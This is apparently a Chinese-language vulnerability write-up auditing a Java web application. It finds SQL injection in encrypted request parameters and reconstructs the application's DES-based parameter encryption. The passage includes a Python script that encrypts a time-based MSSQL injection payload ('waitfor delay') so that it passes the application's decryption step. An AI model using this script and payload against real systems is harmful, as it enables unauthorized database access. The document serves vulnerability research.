59Y1VLv9/POT2GHyyZynCf3Rxuck5V+kFf1NzcDJ6eePd2Qa6DPhOwShzuwc8TdP5xFGaMNjDIU+NCrZ1PjtvYU+8U5Q038f+maOw5ouM/yMAEfw2zWbHrpI2Py/TWm3OlFKERJh4YbmB4gIanVZFfrvPBKRtnrS3b+Br4zRwTCa0D2MTvl5paP3/ocDN/LW5LLzjCxIPDDYwK0DDZFdlFdlZn2CmwO0ehFcFhJlaMMDAyQMPbriiq0FmbYSO9qWfzTUgw8e0hBhK8oLJS5+1i6MpljTIZ+MltJvxOW/lFdlsKSmmsnOfBtCob3z9ix65pLrUzXJzWZ8Bwcf802/jDJhvpHR9Z7cZ6ONIzMDxlMD9bGMmwQCjOKuA3R9Ul6SmlETWyHz+5M4bJsV54mZs5nVHIH9cUkFbfyYGq+QLpRbA43IdwpajQNJfTU0pj6PTB/NeCSJIiPfHRbVSUXOCzT0/zl7RmlKahIhP4+DeDGNbaVol8/nrLHa/S2fz6Vn54wLmMQxk4yIu6tKMUX8M6YSpsMd99bhnRrfku5ekXl7aUu+1RYFe3g7YpSp/8q5Zxy1KIDVQ0nD/CtrX/Ir2sbX0Ob08vsFXR7PQYni3zX/z9d77Yne7VlNLwH7qQ2xfcyqDYYAyWCoqOb2bT+u2UOU2tUENX8p9PjuD46s/xTVnKsChvmqrOcHzDe2zLqHK0s08KD//iIbw3P8/rX5c55ZHIgp8+x9i8v/OH9w65FQB0pXzutN/l6IU5lFg1YsMigFr32kV5EJl8P4vnjicqEGpztvHFyRgevDuSHb/7JTsrHdsOuOf3PDziKG/9ehUFF8dw0uM890h/9r/4M7aVaG7mayRy8goWzBlPbFgAHqqJ+rKzHE9dxdaTlY79cY3tcsm+cHP/+g9eyLwFMxgcF4rRUk3F2T2OKSK1TsdEF/oVQGP2Bt7btJ38Rg2feJeLfF3IOL+Yx808zjsfb+7sN6U0AoYu4LYFMxgQHYxHUzUlZ7bx9WebOe80bb/f0hd4ZGIGn661MWHJFKL9rNTmHWTLR2vIrLK7XT5X6+vSPuu144E3DTlfsfP4vpZglcOFoiKaGU5wOHCZAIntdBo5zdMZOKwf5Lj/WIM7150XhcV48HySgQRPRVW1zkfHdA6Znerbjdfj3gkmXh2q+O1mG6eNRp5dYGLweSv/flyhQk28dAu8u9HKoZbrzn79TDw4xECir4angpp6nV2ZdtaW6q39xVVyHLqG86oKZNwTv2RpQjYf//5lTrZc3wZO+yFP3RXH6bd/wSfpDa3lCxg0j3mLZjIwOgRPWw3l2bvZ9tlGcmra32u40s6uHK/cqW/HqXQdp9A5l687j3+9JSQkDGqyKDfTGo+pLSmhmaGO49B519OSftA7/aC+oR58AvEzAr07e7nH9ZmAFQCagdsGKQ6esbPbpDFrsJEnJkHhdht5HW68xw3UOFxg5y27xsgBBpZMMlK3XWdTo+PvxgATP0g2ElxtZ/0JhdlTY85gI//hAz/da6NS06BZ8cFhG/5AYq
<p blockindex=16><img src="data:image/png;base64,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
前端接受usernumber、i9999、kind三个参数，分别赋值给var3、var4、var5三个变量。而后续逻辑明显可以看到sql语句的拼接，也就是注入点。发现var3和var4可注入，而var5是作为if的判断值。var3参数也经过 PubFunc.decrypt的解密。因此这个接口的注入，var4是比较简单的,var3需要经过解密操作。</p>
<h2 blockindex=17>0x03 加解密破解</h2>
<p blockindex=18>由上方的漏洞审计可知，两个漏洞参数都需要进行解密操作，意味着前端传入的参数值是一个密文。跟进解密方法查看代码。刚好看到加密方法也在上方。</p>
<pre blockindex=19><code class="hljs language-js">public <span class=hljs-keyword>static</span> <span class=hljs-built_in>String</span> <span class=hljs-function><span class=hljs-title>encrypt</span>(<span class=hljs-params><span class=hljs-built_in>String</span> var0</span>)</span> {  
    <span class=hljs-keyword>if</span> (<span class=hljs-literal>null</span> \== var0) {  
        <span class=hljs-keyword>return</span> <span class=hljs-string>""</span>;  
    } <span class=hljs-keyword>else</span> {  
        <span class=hljs-built_in>String</span> var1 = SafeCode.encrypt(var0);  
        var1 = var1.replaceAll(<span class=hljs-string>"%"</span>, <span class=hljs-string>"@2HJ5@"</span>);  
        var1 = var1.replaceAll(<span class=hljs-string>"\\\\+"</span>, <span class=hljs-string>"@2HJB@"</span>);  
        var1 = var1.replaceAll(<span class=hljs-string>" "</span>, <span class=hljs-string>"@2HJ0@"</span>);  
        var1 = var1.replaceAll(<span class=hljs-string>"\\\\/"</span>, <span class=hljs-string>"@2HJF@"</span>);  
        var1 = var1.replaceAll(<span class=hljs-string>"\\\\?"</span>, <span class=hljs-string>"@3HJF@"</span>);  
        var1 = var1.replaceAll(<span class=hljs-string>"#"</span>, <span class=hljs-string>"@2HJ3@"</span>);  
        var1 = var1.replaceAll(<span class=hljs-string>"&amp;"</span>, <span class=hljs-string>"@2HJ6@"</span>);  
        var1 = var1.replaceAll(<span class=hljs-string>"="</span>, <span class=hljs-string>"@3HJD@"</span>);  
        var1 = var1.replaceAll(<span class=hljs-string>"\\r\\n"</span>, <span class=hljs-string>""</span>).replaceAll(<span class=hljs-string>"\\n"</span>, <span class=hljs-string>""</span>).replaceAll(<span class=hljs-string>"\\r"</span>, <span class=hljs-string>""</span>);  
        var1 = var1.replaceAll(<span class=hljs-string>"@"</span>, <span class=hljs-string>"PAATTP"</span>);  
        <span class=hljs-keyword>return</span> var1;  
    }  
}  

public <span class=hljs-keyword>static</span> <span class=hljs-built_in>String</span> <span class=hljs-function><span class=hljs-title>decrypt</span>(<span class=hljs-params><span class=hljs-built_in>String</span> var0</span>)</span> {  
    <span class=hljs-keyword>if</span> (<span class=hljs-literal>null</span> \== var0) {  
        <span class=hljs-keyword>return</span> <span class=hljs-string>""</span>;  
    } <span class=hljs-keyword>else</span> {  
        var0 = var0.replaceAll(<span class=hljs-string>"PAATTP"</span>, <span class=hljs-string>"@"</span>);  
        var0 = var0.replaceAll(<span class=hljs-string>"@2HJ5@"</span>, <span class=hljs-string>"%"</span>);  
        var0 = var0.replaceAll(<span class=hljs-string>"@2HJB@"</span>, <span class=hljs-string>"\\\\+"</span>);  
        var0 = var0.replaceAll(<span class=hljs-string>"@2HJ0@"</span>, <span class=hljs-string>" "</span>);  
        var0 = var0.replaceAll(<span class=hljs-string>"@2HJF@"</span>, <span class=hljs-string>"\\\\/"</span>);  
        var0 = var0.replaceAll(<span class=hljs-string>"@3HJF@"</span>, <span class=hljs-string>"\\\\?"</span>);  
        var0 = var0.replaceAll(<span class=hljs-string>"@2HJ3@"</span>, <span class=hljs-string>"#"</span>);  
        var0 = var0.replaceAll(<span class=hljs-string>"@2HJ6@"</span>, <span class=hljs-string>"&amp;"</span>);  
        var0 = var0.replaceAll(<span class=hljs-string>"@3HJD@"</span>, <span class=hljs-string>"="</span>);  
        <span class=hljs-built_in>String</span> var1 = SafeCode.decrypt(var0);  
        <span class=hljs-keyword>return</span> var1;  
    }  
}
</code></pre>
<p blockindex=20>先看加密方法，首先var0参数传入到SafeCode.encrypt方法进行加密，跟进此方法，可以看到使用的是des加解密函数，为对称加密算法，意味着只要有加密密钥，即可正向加密，也可逆向解密。而加密密钥即为下图马赛克的值（这属于厂商敏感信息，不明文展示了）：</p>
<p blockindex=21><img src="data:image/png;base64,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
<p blockindex=22>搞懂了加解密算法实际为des加解密，然后再回到PubFunc.encrypt方法，可知进行了des加密后，又要把密文的%，+，/等字符（具体看上方代码）进行一个替换，得到最终的密文。而同样的，查看PubFunc.decrypt方法代码，可得是加密的逆向操作，先对密文进行字符串替换，得到des的密文，再进行des解密。使用此逻辑写python加解密脚本，如下：</p>
<pre blockindex=23><code class="hljs language-js"><span class=hljs-keyword>from</span> Crypto.Cipher <span class=hljs-keyword>import</span> DES
<span class=hljs-keyword>from</span> Crypto.Util.Padding <span class=hljs-keyword>import</span> pad, unpad
<span class=hljs-keyword>from</span> base64 <span class=hljs-keyword>import</span> b64encode, b64decode

def encrypt(key, data):
    key = key.encode(<span class=hljs-string>'utf-8'</span>)
    data = data.encode(<span class=hljs-string>'utf-8'</span>)
    iv = b<span class=hljs-string>'\x01\x02\x03\x04\x05\x06\x07\x08'</span>  # 初始化向量
    cipher = DES.new(key, DES.MODE_CBC, iv)
    ct_bytes = cipher.encrypt(pad(data, DES.block_size))
    var1=b64encode(ct_bytes).decode(<span class=hljs-string>'utf-8'</span>)
    var1 = var1.replace(<span class=hljs-string>"%"</span>, <span class=hljs-string>"@2HJ5@"</span>);
    var1 = var1.replace(<span class=hljs-string>"+"</span>, <span class=hljs-string>"@2HJB@"</span>);
    var1 = var1.replace(<span class=hljs-string>" "</span>, <span class=hljs-string>"@2HJ0@"</span>);
    var1 = var1.replace(<span class=hljs-string>"/"</span>, <span class=hljs-string>"@2HJF@"</span>);
    var1 = var1.replace(<span class=hljs-string>"?"</span>, <span class=hljs-string>"@3HJF@"</span>);
    var1 = var1.replace(<span class=hljs-string>"#"</span>, <span class=hljs-string>"@2HJ3@"</span>);
    var1 = var1.replace(<span class=hljs-string>"&amp;"</span>, <span class=hljs-string>"@2HJ6@"</span>);
    var1 = var1.replace(<span class=hljs-string>"="</span>, <span class=hljs-string>"@3HJD@"</span>);
    var1 = var1.replace(<span class=hljs-string>"\r\n"</span>, <span class=hljs-string>""</span>).replace(<span class=hljs-string>"\n"</span>, <span class=hljs-string>""</span>).replace(<span class=hljs-string>"\r"</span>, <span class=hljs-string>""</span>);
    var1 = var1.replace(<span class=hljs-string>"@"</span>, <span class=hljs-string>"PAATTP"</span>);
    <span class=hljs-keyword>return</span> var1

def decrypt(key, encrypted_data):
    key = key.encode(<span class=hljs-string>'utf-8'</span>)
    encrypted_data = encrypted_data.replace(<span class=hljs-string>"PAATTP"</span>, <span class=hljs-string>"@"</span>);
    encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJ5@"</span>, <span class=hljs-string>"%"</span>);
    encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJB@"</span>, <span class=hljs-string>"+"</span>);
    encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJ0@"</span>, <span class=hljs-string>" "</span>);
    encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJF@"</span>, <span class=hljs-string>"/"</span>);
    encrypted_data = encrypted_data.replace(<span class=hljs-string>"@3HJF@"</span>, <span class=hljs-string>"?"</span>);
    encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJ3@"</span>, <span class=hljs-string>"#"</span>);
    encrypted_data = encrypted_data.replace(<span class=hljs-string>"@2HJ6@"</span>, <span class=hljs-string>"&amp;"</span>);
    encrypted_data = encrypted_data.replace(<span class=hljs-string>"@3HJD@"</span>, <span class=hljs-string>"="</span>);
    encrypted_data = b64decode(encrypted_data)
    iv = b<span class=hljs-string>'\x01\x02\x03\x04\x05\x06\x07\x08'</span>  # 初始化向量
    cipher = DES.new(key, DES.MODE_CBC, iv)
    pt_bytes = unpad(cipher.decrypt(encrypted_data), DES.block_size)
    <span class=hljs-keyword>return</span> pt_bytes.decode(<span class=hljs-string>'utf-8'</span>)

<span class=hljs-keyword>if</span> __name__ == <span class=hljs-string>"__main__"</span>:
    key = <span class=hljs-string>"xxxxx"</span>
    data = <span class=hljs-string>"1' if db_name(1)='master' waitfor delay '0:0:6'--+"</span>

    encrypted_data = encrypt(key, data)
    print(<span class=hljs-string>"Encrypted:"</span>, encrypted_data)
    encrypted_data=<span class=hljs-string>'0JALorlQogBNgRuaXkp7QCus5DXQ1K1RU60C2QunGQUgKkcXUh9HXukA75IwTpCaGcqFlluMQLvPAATTP2HJFPAATTPgvSl8mZXxPAATTP2HJFPAATTPe2LWnL7Rg2Ceg0zzONMioPAATTP3HJDPAATTP'</span>
    decrypted_data = decrypt(key, encrypted_data)
    print(<span class=hljs-string>"Decrypted:"</span>, decrypted_data)

</code></pre>
<p blockindex=24>运行示意图：</p>
<p blockindex=25><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABfkAAABXCAYAAAC3Dk9MAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOy9e1xc5Z34/z5cck8M4RLDZIYoxpk2dTXWS0bQDdTYlUm7W9uiJanYteYLVLtdt7MtVFrdsbBd2rqtCmzb9Ld0E6pTay8b2FZtEhUcqtaoNToTJAlMDpAAIeZ+Ac7vjzNn7jPMIZBE8rxfL17AzHOe89wvn+fzfD7SvHnzFAQCgUAgEAgEHxrS0tIAOH78OACnTp06n8kRCAQCgUAgEAgEAsF5JOl8J0AgEAgEAoFAIBAIBAKBQCAQCAQCwcRIOd8JEAimgpSU1MTCperrArNmztIV/vTpM7rC60wOx0/o09ycPXu2/+/Dhw/re5lAIBAIzjspKepEMWfOHAAOHTp0PpMjEAgEAoFAIBAIBIILACHkF5xTEhW+a8yePUNX+BMnTusKfzGzYMGCccOMjumz5jV31vj1dWBwSFecAoFAIBAIBAKBQCAQCAQCgSA2QsgvmDApyUmMjI6d72QIPmRkZaT7/z546BAjI6PnMTUCgUDw4SIzMxMI2OJXFOFaSSAQCAQCgUAgEAgudoRNfsGESEkWTUcwOaSkJJ/vJAgEAoFAIBAIBAKBQCAQCAQfWlLmzZun64GTp/TZAB/TqaU7Z+4cXeFHx/RpkidJuoIzZ85cXeGPHDmiK/zJkyd1hddLUrI+8zhJCK1qwbknXNAvtPsFAoEgFM0Gv2ZqbWBg4HwmRyAQCAQCgUAgEAgEFxDCXI9AIBAILgiSk6f2VsfoqDg8EggEAoFAIBAIBAKBQDD9EEJ+gUAgEAgEggmiadgnJalm7I4ePTol78nIyABgZGQk5LdAIBAIBAKBQCAQCARCyC8QCATjIFlsFOXmkJ8PTVUNuM+xo0vJUkFNdTFWg/q/7KrDUdWqOx3nOx+CyUOSLBQV5ZKTXwJt66lvEXUpEAgEAoFAIBAIBALBxYrwnioQCC44LjRnvObcHPJLirGazv27JUsFm6qNtDkKWL16NQVldfSY7DTWFOmO63zmQzDJmFUBf7HVgPF8p2Wak5SURFJSErNnz2b27NlkZWWRlZXF8uXLWb58OZdddhmXXXYZycnJU2Jyas6cOcyZM4eFCxeycOFChoeHGR4envT3CAQCgUAgEAgEAoHgw4sQ8gsEgguScy3olyQLFbUVWKRI79zulnqqml3nND0a5sI8DD1ttLhVTW3F3aKmxVpChUWfJ/HzmQ/B5KK4W2iocuCUz3dKBAKBQCAQCAQCgUAgEJxvUi67/HJdD3Tt3qMr/My5+s4RZs2Zqyu8lKQv/iSd4bMyF+sKv79fn8Rl/sJFusKPnTqmK/xJZukKn33JDF3hj57U58hyTNFnQ/jo0eO6wi+4RJ/JilGdNo3TFi3UFf7QB0d0hU9fME9X+H19B3SFz8lZqiv8/gNDusIvWayvPZ8